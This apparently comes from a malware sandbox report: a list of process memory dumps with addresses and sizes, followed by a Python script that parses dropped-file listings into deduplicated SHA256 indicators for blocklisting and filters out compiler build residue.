  SHA512: 30b0f1d6ca38cf067b85fb51556b52f2dd743055ea08b8e72d2ad654aff178093d13ca0c19b4b6a1c728978df90b2e7b9941ca2b3bf75694c7220d40b28579bb

• memory/516-143-0x0000000000000000-mapping.dmp
• memory/536-168-0x00000223FA1E0000-0x00000223FA283000-memory.dmp
  Filesize: 652KB
• memory/696-150-0x0000000000000000-mapping.dmp
• memory/844-222-0x0000000000000000-mapping.dmp
• memory/920-223-0x0000000000000000-mapping.dmp
• memory/1092-226-0x0000000000000000-mapping.dmp
• memory/1152-211-0x0000000000000000-mapping.dmp
• memory/1160-187-0x0000000000000000-mapping.dmp
• memory/1344-164-0x0000000000000000-mapping.dmp
• memory/1816-131-0x0000000010000000-0x000000001000E000-memory.dmp
  Filesize: 56KB
• memory/1816-136-0x0000000000CD0000-0x0000000000CDD000-memory.dmp
  Filesize: 52KB
• memory/1816-130-0x0000000000000000-mapping.dmp
• memory/1860-161-0x0000000000000000-mapping.dmp
• memory/1932-153-0x0000000000000000-mapping.dmp
• memory/1976-215-0x0000000000000000-mapping.dmp
• memory/1980-231-0x0000000000000000-mapping.dmp
• memory/2232-195-0x0000000000000000-mapping.dmp
• memory/2256-207-0x0000000000000000-mapping.dmp
• memory/2400-213-0x0000000000000000-mapping.dmp
• memory/2528-227-0x0000000000000000-mapping.dmp
• memory/2588-217-0x0000000000000000-mapping.dmp
• memory/2616-162-0x0000000000000000-mapping.dmp
• memory/2616-166-0x00000000005A6B20-0x00000000005A6B24-memory.dmp
  Filesize: 4B
• memory/2616-170-0x0000000000A70000-0x0000000000B06000-memory.dmp
  Filesize: 600KB
• memory/2720-146-0x0000000000000000-mapping.dmp
• memory/2728-198-0x0000000000000000-mapping.dmp
• memory/2876-176-0x0000000000000000-mapping.dmp
• memory/3020-179-0x00000000084A0000-0x00000000085DA000-memory.dmp
  Filesize: 1.2MB
• memory/3020-169-0x000000000B160000-0x000000000B29B000-memory.dmp
  Filesize: 1.2MB
• memory/3020-160-0x0000000007E40000-0x0000000007EE3000-memory.dmp
  Filesize: 652KB
• memory/3020-188-0x0000000007E40000-0x0000000007EE3000-memory.dmp
  Filesize: 652KB
• memory/3144-197-0x0000000000000000-mapping.dmp
• memory/3448-159-0x000001E7C59B0000-0x000001E7C5A53000-memory.dmp
  Filesize: 652KB
• memory/3484-204-0x0000000000000000-mapping.dmp
• memory/3516-209-0x0000000000000000-mapping.dmp
• memory/3576-199-0x0000000000000000-mapping.dmp
• memory/3656-163-0x0000000000000000-mapping.dmp
• memory/3720-165-0x0000019D12F00000-0x0000019D12FA3000-memory.dmp
  Filesize: 652KB
• memory/3932-142-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp
  Filesize: 10.8MB
• memory/3932-141-0x000001CF6D940000-0x000001CF6D962000-memory.dmp
  Filesize: 136KB
• memory/3932-158-0x000001CF6F4E0000-0x000001CF6F51D000-memory.dmp
  Filesize: 244KB
• memory/3932-140-0x0000000000000000-mapping.dmp
• memory/3932-157-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp
  Filesize: 10.8MB
• memory/3936-183-0x0000000000000000-mapping.dmp
• memory/3936-201-0x0000000000000000-mapping.dmp
• memory/4020-178-0x0000000000000000-mapping.dmp
• memory/4036-225-0x0000000000000000-mapping.dmp
• memory/4104-167-0x00000204A5A10000-0x00000204A5AB3000-memory.dmp
  Filesize: 652KB
• memory/4240-189-0x0000000000000000-mapping.dmp
• memory/4276-218-0x0000000000000000-mapping.dmp
• memory/4388-192-0x0000000000000000-mapping.dmp
• memory/4448-193-0x0000000000000000-mapping.dmp
• memory/4452-190-0x0000000000000000-mapping.dmp
• memory/4456-212-0x0000000000000000-mapping.dmp
• memory/4472-202-0x0000000000000000-mapping.dmp
• memory/4616-206-0x0000000000000000-mapping.dmp
• memory/4668-185-0x0000000000000000-mapping.dmp
• memory/4892-229-0x0000000000000000-mapping.dmp
• memory/4912-219-0x0000000000000000-mapping.dmp
• memory/5012-221-0x0000000000000000-mapping.dmp
• memory/5028-174-0x0000000000000000-mapping.dmp
• memory/5088-230-0x0000000000000000-mapping.dmp
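The dropped-file listing above is flat label/value text, and the same path (6602.bin1) appears repeatedly, sometimes as an exact repeat and sometimes with new content. The Python below is an added example, not part of the sandbox report or of the sample's tooling: it parses that layout into records, collapses exact repeats, reports which paths were rewritten with different hashes, extracts the unique SHA256 values, and separates the `Temp\<8 chars>\<8 chars>.{dll,0.cs,cmdline}`, `CSC<hex>.TMP` and `RES<hex>.tmp` files from the rest. The sample input copies four entries from the listing (path, Filesize, MD5, SHA256 only); the parser also accepts SHA1/SHA512 lines and the `memory/` entries. Reading those `ah5igeoc`/`jfroacpp` files as csc.exe and cvtres.exe build residue of the kind PowerShell `Add-Type` leaves in %TEMP% is an inference from the filename layout, not a finding the report states.

```python
"""Parse a sandbox 'dropped files' listing into IOC records.

Added example for this page; it is not part of the sandbox report. The
sample listing copies four entries from the report (path, Filesize, MD5,
SHA256) in the same label-then-value layout. Treating <8 chars>\<8 chars>.
{dll,0.cs,cmdline}, CSC<hex>.TMP and RES<hex>.tmp as csc.exe/cvtres.exe
build residue (what PowerShell Add-Type writes to %TEMP%) is an inference
from the filenames, not something the report asserts.
"""
import re
from collections import defaultdict

LISTING = r"""
• C:\Users\Admin\AppData\Local\Temp\6602.bin1
Filesize
64KB
MD5
397eb325e338a7924c540b5bcd94e374
SHA256
6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c
• C:\Users\Admin\AppData\Local\Temp\6602.bin1
Filesize
64KB
MD5
397eb325e338a7924c540b5bcd94e374
SHA256
6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c
• C:\Users\Admin\AppData\Local\Temp\6602.bin1
Filesize
65KB
MD5
f1a2aa1f4f0c2e950ca2e946f24e52a7
SHA256
1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed
• C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.dll
Filesize
3KB
MD5
8495c9cbe1593820014899a043577e1b
SHA256
08496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8
"""

LABELS = {"Filesize", "MD5", "SHA1", "SHA256", "SHA512"}
PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\?\?\\|memory/)")
# Temp\<8 chars>\<same 8 chars>.{dll,0.cs,cmdline}, CSC<32 hex>.TMP beside them,
# and RES<4 hex>.tmp from cvtres.exe: the layout csc.exe leaves for Add-Type.
CSC_ARTIFACT_RE = re.compile(
    r"\\(?:RES[0-9A-F]{4}\.tmp|(?P<d>[a-z0-9]{8})\\"
    r"(?:(?P=d)\.(?:dll|0\.cs|cmdline)|CSC[0-9A-F]{32}\.TMP))$",
    re.IGNORECASE,
)


def parse_listing(text):
    """Fold the flat path / label / value lines into one dict per entry."""
    records, current, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if pending:                     # previous line was a label
            current[pending.lower()] = line
            pending = None
        elif line in LABELS and current is not None:
            pending = line
        elif PATH_RE.match(line):       # a new entry starts with its path
            current = {"path": line}
            records.append(current)
    return records


def dedupe(records):
    """Drop exact repeats (same path and SHA256), keeping the first one."""
    seen, unique = set(), []
    for rec in records:
        key = (rec["path"].lower(), rec.get("sha256"))
        if key not in seen:
            seen.add(key)
            unique.append(rec)
    return unique


def rewrites(records):
    """Paths written more than once with different content (staged payloads)."""
    by_path = defaultdict(list)
    for rec in dedupe(records):
        by_path[rec["path"].lower()].append(rec.get("sha256"))
    return {path: hashes for path, hashes in by_path.items() if len(hashes) > 1}


def classify(path):
    return "csc-build-artifact" if CSC_ARTIFACT_RE.search(path) else "dropped-file"


def sha256_iocs(records):
    """Unique SHA256 values suitable for a blocklist or a retro-hunt."""
    return sorted({rec["sha256"] for rec in records if "sha256" in rec})


if __name__ == "__main__":
    recs = dedupe(parse_listing(LISTING))
    for rec in recs:
        print(f"{classify(rec['path']):18} {rec['sha256']}  {rec['path']}")
    for path, hashes in rewrites(recs).items():
        print(f"rewritten {len(hashes)}x with different content: {path}")
```

Feed it the whole listing (the same layout the report uses) and the `rewrites` output gives the sequence of hashes 6602.bin1 went through, while `classify` lets you drop the compiler residue from a hash blocklist, where it would only add noise.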